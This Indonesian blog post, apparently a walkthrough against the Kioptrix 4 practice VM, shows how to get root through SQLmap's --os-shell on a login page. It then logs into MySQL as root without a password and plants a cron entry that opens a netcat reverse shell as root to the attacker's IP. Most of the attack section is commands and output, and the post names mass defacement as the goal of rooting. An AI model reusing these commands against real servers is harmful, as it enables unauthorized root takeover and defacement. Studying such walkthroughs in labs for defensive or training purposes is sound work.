Searching...
May 11, 2012
Friday, May 11, 2012

Special Rooting [via SQLmap]

Root adalah user yang memiliki hak akses tertinggi dalam sistem operasi UNIX. Dalam system operasi Windows, root sama dengan NT AUTHORITY SYSTEM. Privilege escalating pada sistem operasi UNIX cukup mudah. User biasanya menggunakan perintah

Command :
user@unix:~$ suPassword: su: Authentication failureuser@unix:~$

Pada perintah su, user harus memasukan password milik root. Jika berhasil, maka user akan menjadi root dalam sistem tersebut. Kebanyakan mesin komputer yang memiliki OS UNIX, password root TIDAK diberikan secara cuma-cuma kepada user lain. Artinya password root hanya diketahui oleh segelintir orang. Hal ini bertujuan agar sistem tetap aman, tanpa user 'nakal' yang menggunakan hak akses root untuk mengubah system.

Mengangkat hak akses juga bisa dilakukan dengan perintah

Command :
user@unix:~$ iduid=2000(user) gid=2000(user) groups=2000(user)user@unix:~$ sudo suPassword: [sudo] password for www-data:root@unix:~# iduid=0(root) gid=0(root) groups=0(root)

Ini adalah sedikit contoh mengenai escalating privilege pada unix. Namun perusahaan yang cerdas, akan membatasi user untuk mengeksekusi perintah sudo su, agar user 'nakal' tidak menggunakan hak akses root untuk mengubah system.

Apa istimewanya root? Kali ini saya akan menjelaskan sedikit kemampuan khusus yang dimiliki oleh root. Yaitu menghapus data milik user lain.

Command :
www-data@red-dragon:/tmp$ echo "delete me if you can" > fuck_youwww-data@red-dragon:/tmp$ ls -l fuck_you -rw-r--r-- 1 www-data www-data 21 2012-05-11 10:09 fuck_youwww-data@red-dragon:/tmp$ cat fuck_you delete me if you can

User bernama www-data membuat sebuah file bernama fuck_you, yang berisi "delete me if you can". File ini terletak pada folder /tmp/.

Note : Tulisan yang berwarna kuning adalah hasil output dari perintah.
Kemudian datang user lain bernama couchdb. User ini sepertinya tidak suka dengan isi dan nama file yang dibuat oleh user www-data. Kemudian ia mencoba untuk menghapus file tersebut.

Command :
couchdb@red-dragon:/tmp$ ls -l fuck_you -rw-r--r-- 1 www-data www-data 21 2012-05-11 10:09 fuck_youcouchdb@red-dragon:/tmp$ rm fuck_yourm: remove write-protected regular file `fuck_you'? YESrm: cannot remove `fuck_you': Operation not permitted

Mengapa bisa seperti ini? Telah kita ketahui sebelumnya bahwa file ini milik user www-data, ketika user couchdb hendak menghapus file ini, maka system berkata:

"File ini milik www-data, kau tidak bisa menghapus file ini..."

Perhatikan ketika root hendak menghapus file ini

Command :
root@red-dragon:/tmp# ls -l fuck_you -rw-r--r-- 1 www-data www-data 21 2012-05-11 10:09 fuck_youroot@red-dragon:/tmp# rm fuck_youroot@red-dragon:/tmp# ls -l fuck_yourm: cannot remove `fuck_you': No such file or directory

File berhasil dihapus oleh root. Pada kasus web server, penggunaan hak akses ini yang membatasi peretas dalam melakukan mass deface. Karena peretas masuk ke dalam system dengan user A, dan tidak bisa mengganti file index milik user B-Z. Pada tahap seperti ini, peretas harus dapat mengangkat hak aksesnya menjadi root agar peretas dapat melancarkan serangan mass deface pada web server target.

Kali ini saya akan menjelaskan skema peretasan hak akses root hanya dengan menggunakan SQLmap! Saya melanjutkan peretasan pada KIOPTRIX 4, yang berjalan pada VMware saya. Percobaan peretasan KIOPTRIX 4 sudah saya jelaskan pada postingan saya sebelumnya.

Skill Requirements:
  1. MYSQL command line
  2. Spawn Shell With SQLmap

Tools Requirements:
  1. SQLmap (dapat ditemukan pada backtrack 5) 
Attacking Schema:
  1. Attacker mengendalikan shell system milik korban
  2. Mencari informasi mengenai password root database MySQL
  3. Login database dengan akses root, dan membuat evil database
  4. Meremote cron.d milik korban
  5. GAME OVER
EULA
Tutorial ini di tulis dengan tujuan edukasi, penyalahgunaan skill yang terdapat dalam tutorial ini adalah tanggung jawab pembaca.

Walktrough
1. Spawn Bash With SQLmap

Untuk mengendalikan shell system milik korban, kita dapat menggunakan SQLmap. Pada tutorial sebelumnya, saya telah menjelaskan cara melakukan spawn bash dengan SQLmap.

Command :
<< back|track 5 R2 [~] sqlmap -u "http://10.10.1.128/checklogin.php" --data="POSTDATA=myusername=admin&mypassword=admin&Submit=Login" --drop-set-cookie --os-shell

Setelah bash telah tereksekusi, kita akan menggunakan backdoor sederhana ini untuk melakukan rooting. Kali ini saya akan melakukan rooting melalui MYSQL yang berjalan pada system korban. Namun untuk mengakses database, saya harus dapat log in ke dalam database, dengan username dan password yang telah terdaftar pada database system. Pada posting sebelumnya mengenai Tricky Log In to MYSQL, kita telah mengetahui, bahwa root password bernilai blank. Artinya, kita dapat log in ke database dengan username root TANPA password.

Command :
os-shell>  mysql -uroot -e "show databases;"do you want to retrieve the command standard output? [Y/n/a] command standard output:---Databaseinformation_schemamembersmysql---



Parameter -e akan mengeksekusi perintah SQL. Gunakan tanda petik dua untuk mengapit command MySQL, dan akhiri command mysql dengan titik koma. Setelah ini, kita buat database baru dengan nama exploit.

Command :
os-shell> mysql -uroot -e "create database exploit;"do you want to retrieve the command standard output? [Y/n/a] No outputos-shell> mysql -uroot -e "show databases;"do you want to retrieve the command standard output? [Y/n/a] command standard output:---Databaseinformation_schemaexploitmembersmysql---

Database exploit, telah berhasil dibuat. Selanjutnya kita buat tabel bernama rootme, dan kolom bernama stack dengan atribut text.

Note : Jika command mysql berhasil di eksekusi, maka tidak ada output yang tercipta (No Output).

Command :
os-shell> mysql -uroot -e "use exploit; create table rootme (stack text);"do you want to retrieve the command standard output? [Y/n/a] No outputos-shell> mysql -uroot -e "use exploit; show tables;"do you want to retrieve the command standard output? [Y/n/a] command standard output:---Tables_in_exploitrootme---


Selanjutnya kita input table ini dengan perintah cron.d. Ketahuilah rooting sebelumnya dengan burpsuite, dimana attacker menaruh perintah cron.d agar root mengeksekusi file tersebut, sehingga attacker mendapatkan shell dengan privilege root. Artikel dapat ditemukan di SQL Injection Level 4 Final [rooting]. Tabel ini kita masukan perintah cron.d seperti ini

Command :
* * * * * root /bin/nc.traditional 10.10.1.1 666 -e /bin/bash

Dimana 10.10.1.1 adalah IP saya (sesuaikan dengan IP address anda), dan 666 adalah port listener netcat saya. Kita input perintah ini ke dalam table rootme.

Command :
os-shell> mysql -uroot -e "use exploit; insert into rootme value ('* * * * * root /bin/nc.traditional 10.10.1.1 666 -e /bin/bash \r\n');"do you want to retrieve the command standard output? [Y/n/a] No outputos-shell> mysql -uroot -e "use exploit; select * from rootme;"do you want to retrieve the command standard output? [Y/n/a] command standard output:---stack* * * * * root /bin/nc.traditional 10.10.1.1 666 -e /bin/bash 
---


Kita jalankan netcat listener pada port 666 dari attacker.

Command :
<< back|track 5 R2 [~] nc -l -v -p 666


Setelah menunggu 2 menit, file cron.d tereksekusi, dan kita akan mendapatkan koneksi netcat dari korban dengan privilege root.

Command :
<< back|track 5 R2 [~] nc -l -v -p 666listening on [any] 666 ...10.10.1.128: inverse host lookup failed: Unknown hostconnect to [10.10.1.1] from (UNKNOWN) [10.10.1.128] 49490iduid=0(root) gid=0(root) groups=0(root)


You are so....

pwned by : red-dragon

3 comment:

Post a Comment

 
Back to top!